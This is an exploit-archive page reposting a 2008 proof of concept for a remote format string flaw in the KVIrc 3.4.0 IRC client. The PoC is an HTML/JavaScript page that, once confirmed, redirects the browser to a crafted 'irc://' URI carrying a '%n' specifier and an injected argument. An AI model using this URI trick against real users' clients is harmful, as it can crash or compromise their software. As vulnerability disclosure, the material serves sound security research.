Advertisement






KVIrc 3.4.0 Virgo Remote Format String Exploit PoC

CVE Category Price Severity
CWE-Other Not disclosed High
Author Risk Exploitation Type Date
Unknown High Remote 2008-10-31
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008100249

Below is a copy:

<!--

 KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

 Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
 KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
 the contribution of many IRC addicted developers around the world.

 Product web page: http://www.kvirc.net/

 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

 liquidworm [t00t] gmail [d0t] com

 http://www.zeroscience.org

 24.10.2008

-->


<html>

<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>

<head>

<body>

<center> <br /> <br /> <strong>Warning ! :)</strong> </center>

<body bgcolor="#FFFF00">

<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

function poc()
{
	window.location.href = "irc://A:%n -i";
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true) 
{
	poc();
}

	else
	{
		window.location.href = "http://www.kvirc.net";
	}

</script> </body> </head> </html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum